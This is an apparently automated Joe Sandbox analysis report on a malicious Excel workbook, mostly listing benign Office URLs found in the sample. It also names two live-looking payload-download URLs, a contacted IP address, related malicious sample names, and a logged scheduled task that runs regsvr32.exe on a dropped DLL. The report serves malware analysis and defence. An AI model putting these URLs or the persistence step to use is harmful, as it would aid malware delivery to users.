                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.addins.omex.office.net/appinfo/queryA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                        high
                        https://clients.config.office.net/user/v1.0/tenantassociationkeyA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                          high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            high
                            https://powerlift.acompli.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://lookup.onenote.com/lookup/geolocation/v1A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                              high
                              https://cortana.aiA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                high
                                https://cloudfiles.onenote.com/upload.aspxA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                  high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                    high
                                    https://entitlement.diagnosticssdf.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                      high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                        high
                                        https://api.aadrm.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                          high
                                          https://api.microsoftstream.com/api/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                              high
                                              https://cr.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                high
                                                https://gruasphenbogota.com/C74hwGGxi/ka.htmlintlsheet1.binfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://portal.office.com/account/?ref=ClientMeControlA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                  high
                                                  https://graph.ppe.windows.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                    high
                                                    https://res.getmicrosoftkey.com/api/redemptioneventsA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://powerlift-frontdesk.acompli.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://tasks.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                      high
                                                      https://officeci.azurewebsites.net/api/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/workA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                        high
                                                        https://store.office.cn/addinstemplateA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                          high
                                                          https://globaldisco.crm.dynamics.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                            high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                              high
                                                              https://store.officeppe.com/addinstemplateA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://dev0-api.acompli.net/autodetectA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.odwebp.svc.msA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.powerbi.com/v1.0/myorg/groupsA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                high
                                                                https://web.microsoftstream.com/video/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                  high
                                                                  https://graph.windows.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                    high
                                                                    https://dataservice.o365filtering.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://officesetup.getmicrosoftkey.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/apiA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetectA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                            high
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                              high
                                                                              https://ncus.contentsync.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspxA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                          high
                                                                                          https://management.azure.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                            high
                                                                                            https://wus2.contentsync.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://incidents.diagnostics.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                              high
                                                                                              https://clients.config.office.net/user/v1.0/iosA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                high
                                                                                                https://insertmedia.bing.office.net/odc/insertmediaA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                  high
                                                                                                  https://o365auditrealtimeingestion.manage.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                      high
                                                                                                      https://api.office.netA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                        high
                                                                                                        https://incidents.diagnosticssdf.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                          high
                                                                                                          https://asgsmsproxyapi.azurewebsites.net/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                            high
                                                                                                            https://entitlement.diagnostics.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                    high
                                                                                                                    https://templatelogging.office.com/client/logA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                        high
                                                                                                                        https://webshell.suite.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                            high
                                                                                                                            https://carpascapital.com/gBPg8MtsGbv/ka.html%intlsheet1.binfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://management.azure.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://visio.uservoice.com/forums/368202-visio-on-devicesA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://directory.services.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://login.windows-ppe.net/common/oauth2/authorizeA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        50.116.92.246
                                                                                                                                                        carpascapital.comUnited States
                                                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                        Analysis ID:440113
                                                                                                                                                        Start date:24.06.2021
                                                                                                                                                        Start time:20:50:58
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 9m 59s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:plan-1053707320.xlsb
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:33
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSB@20/19@2/1
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 60.8% (good quality ratio 57.1%)
                                                                                                                                                        • Quality average: 79%
                                                                                                                                                        • Quality standard deviation: 28.6%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 81%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsb
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.64.90.137, 13.88.21.125, 52.109.32.63, 52.109.12.23, 20.82.210.154, 52.147.198.201, 20.54.104.15, 20.54.7.98, 40.112.88.60, 173.222.108.210, 173.222.108.226, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.190.159.133, 20.190.159.131, 40.126.31.140, 40.126.31.3, 40.126.31.138, 40.126.31.2, 20.190.159.135, 20.190.159.137, 52.255.188.83
                                                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        20:52:13Task SchedulerRun new task: wtdsqwcv path: regsvr32.exe s>-s "C:\Users\user\gihi1.dll"

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        50.116.92.246plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                          plan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                            plan-277786552.xlsbGet hashmaliciousBrowse

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              carpascapital.complan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              plan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              gruasphenbogota.complan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              plan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              plan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              UNIFIEDLAYER-AS-1USplan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                                                                                                                              • 74.220.199.6
                                                                                                                                                              T5gtQGRL8u.exeGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.135.156
                                                                                                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.114.107
                                                                                                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.114.107
                                                                                                                                                              PO 74230360.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.114.107
                                                                                                                                                              plan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              7UXBXIr31E.exeGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.198.10
                                                                                                                                                              TW8o2zNu2Q.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.109.135
                                                                                                                                                              xwKdahKPn8.exeGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.164.216
                                                                                                                                                              plan-277786552.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Order.exeGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.183.94
                                                                                                                                                              0rder-bcm_23062021.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.87.249.240
                                                                                                                                                              wdxYcFUCJV.exeGet hashmaliciousBrowse
                                                                                                                                                              • 74.220.199.6
                                                                                                                                                              Inv 820984.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 162.144.12.168
                                                                                                                                                              N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.216.218
                                                                                                                                                              droxoUY6SU.exeGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.185.25
                                                                                                                                                              idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.165.249
                                                                                                                                                              idea-22543577.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.165.249
                                                                                                                                                              Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.60.126

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19plan-1053707320.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Oqq8nQNRt0.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              DocuSign-June-SOA-Dues.261.htmGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Invoice 715320 paul@forthebiome.com.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Quote Requirment R2106131401 .docxGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              h2GeNTLcFz.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              iLNAALfs8Y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              OsAwg7NTuy.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Terms and Conditions pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              887cPpO46m.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Lista degli ordini.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              GDiwiEVONn.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              L6AaziH5ts.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              L6AaziH5ts.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              A7DmPhc0bs.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Invoice_634000.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              Redoslijed na popisu.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              LtmQGHQsK1.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              plan-930205822.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246
                                                                                                                                                              mCzW1o1ZtQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.116.92.246

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_d6c4e44bbad4515086a963364165f93d4a33398_7a325c51_13ef4904\Report.wer
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11460
                                                                                                                                                              Entropy (8bit):3.7741173117335585
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:zzclb6VwcH/RS5uGXx3RjetA/u7saS274ItUt:Pch6VT/RS5n3jeC/u7saX4ItUt
                                                                                                                                                              MD5:15F762162A144362E720C1547D2B9C20
                                                                                                                                                              SHA1:07C57885EBAD5FBAEE82E3A63852A00823C1B542
                                                                                                                                                              SHA-256:2C61000AF99003333633BAFF4D9233C38AA4A4FD5F759920116E3FFD847B89D8
                                                                                                                                                              SHA-512:CE261BC172FE673A2BBAC8B4101DD643CF51954747DB7C93D780AE333461D4BEAA41B07D9591407A111F77DACE3E4B307CA5C623E64796ED58422FF4C6B171E0
                                                                                                                                                              Malicious:false
